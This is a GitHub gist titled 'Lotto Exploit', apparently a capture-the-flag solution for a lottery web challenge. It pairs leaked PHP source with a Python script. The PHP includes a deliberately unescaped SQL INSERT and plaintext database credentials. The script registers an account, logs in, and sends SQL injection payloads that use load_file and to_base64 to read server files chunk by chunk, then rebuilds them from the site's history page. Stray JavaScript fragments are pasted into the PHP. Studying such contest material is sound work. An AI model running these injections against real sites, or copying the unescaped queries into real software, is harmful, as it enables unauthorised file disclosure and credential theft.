Skip to content

Instantly share code, notes, and snippets.

@stypr
Last active August 3, 2019 16:54
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save stypr/82fb47f69f97a6452b2a4f5adbb6599e to your computer and use it in GitHub Desktop.
Save stypr/82fb47f69f97a6452b2a4f5adbb6599e to your computer and use it in GitHub Desktop.
Lotto Exploit
<?php
function generator()
{
$PATH = "./s3cre7_fi1e";
$init_seed = 0;
if(!file_exists(realpath($PATH)))
{
$init_seed = $seed = intval(uniqid(),10);
$f = fopen($PATH,"w");
fwrite($f,$init_seed);
fclose($f);
}
$f = fopen($PATH,"r");
$data = fread($f,filesize($PATH));
$init_seed = $seed = intval($data,10);
srand($init_seed);
for( $i=0; $i<$init_seed%100; $i++)
{
$seed = rand() * rand();
srand($seed);
$tmp = rand()*rand();
$length = strlen($tmp);
$cutting = (int)($length/4);
$tmp2= substr($seed,$cutting,$length-$cutting*2);
$seed = $tmp2*$tmp2;
}
$ret = array(7);
$new_seed = 0;
for( $i=0; $i<7; $i++)
{ $new_seed = rand();
$number = ($new_seed%77)+1;
if(in_array($number,$ret))
{
$i--;
continue;
}
$ret[$i] = $number;
}
$f = fopen($PATH,"w");
fwrite($f,$new_seed);
fclose($f);
return $ret;
}
?>
<?php
include '9en3rat0r.php';
include 'd6conn.php';
//if(time()>1509576900)
//{
### MAKE LOTTO NUMBERS ###
$luckyNumber = generator();
sort($luckyNumber);
$luckyNumber = implode(",",$luckyNumber);
### CHECK ROUND ###
$round = getRound($conn);
### CHECK WINNER ###
$q = "SELECT * FROM ATTEMPT WHERE no={$round}";
$res =mysqli_query($conn,$q);
$Winners = array();
while($row = mysqli_fetch_array($res))
{
if($luckyNumber == $row['numbers'])
array_push($Winners,$row['name']);
}
### WRITE HISTORY ###
$Winners = implode(",",$Winners);
$q = "INSERT INTO LOG(luckyNumbers,winners) values('{$luckyNumber}','{$Winners}')";
$res = mysqli_query($conn,$q);
/* Winners = Sakuya
"1":"1',3,(SELECT winners FROM LOG WHERE winners=winners LIMIT 1))-- -",
*/
$.post("/buy_check.php", d, function(f){ console.log(f) });"""
### WRITE CURRENT TIME ###
$f = fopen("/var/www/T1M3","w");
fwrite($f,date("Y-m-d H:i:s"));
fclose($f);
//}
?>
<?php
$HOST = "locaalhost";
$USER = "lo77o";
$PASS = "g0db!essU";
$DB_NAME = "LOTTO";
$conn = mysqli_connect($HOST,$USER,$PASS,$DB_NAME);
function getRound($conn)
{
$q = "SELECT max(no)`round` FROM LOG";
$row = mysqli_fetch_array(mysqli_query($conn,$q));
if($row['round'] == "")
$row['round'] = 0;
return $row['round']+1;
}
?>
import sys
from base64 import *
import requests
import time
"""l = "520";
d = {'65':'65',
'23':'23',
'45':'45',
'74':'74',
"1":"1',3,(SELECT to_base64(left(right(load_file('/var/www/html/e57717591ebe1d829b3def08f229a53b.php'),"+l+"),20))))-- -",
'5':'5', '6':'6'};
$.post("/buy_check.php", d, function(f){ console.log(f) });"""
cookie = ""
def login(u, p):
global cookie
url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/login_check.php"
res = requests.post(url, data = {'userid': u, 'userpw': p})
cookie = res.cookies
return res.text
def register(u, p):
global cookie
url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/register_check.php"
res = requests.post(url, data = {'userid': u, 'userpw': p})
return res.text
def parse_history():
global cookie
url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/?p=history"
res = requests.get(url, cookies=cookie)
hist = [i.split("<td>")[1:] for i in res.text.split("<tbody>")[1].split("</tbody>")[0].split("<tr>")]
return [i[2].split("</td>")[0] for i in hist[1:]]
def leak(fn, s=20):
global cookie
l = str(s)
senddata = {'65':'65', '23':'23', '45':'45', '74':'74', '5':'5', '6':'6', \
"1":"1',3,(SELECT to_base64(left(right(load_file('"+fn+"'),"+l+"),20))))-- -" }
url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/buy_check.php"
res = requests.post(url, cookies=cookie, data=senddata)
if "Your luckyNumber" in res.text:
return True
else:
return False
def leak_file(fn):
for i in range(20, 8192, 20):
while leak(fn, i) == False:
time.sleep(1)
pass
print('-------------------')
print(''.join([b64decode(k) for k in parse_history()[::-1]]))
print register('stypry', 'stypry') #duplicate registration possible
print login('stypry', 'stypry')
#print leak_file("/var/www/html/e57717591ebe1d829b3def08f229a53b.php")
#print leak_file("/var/www/html/9en3rat0r.php")
print leak_file("/var/www/html/d6conn.php")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment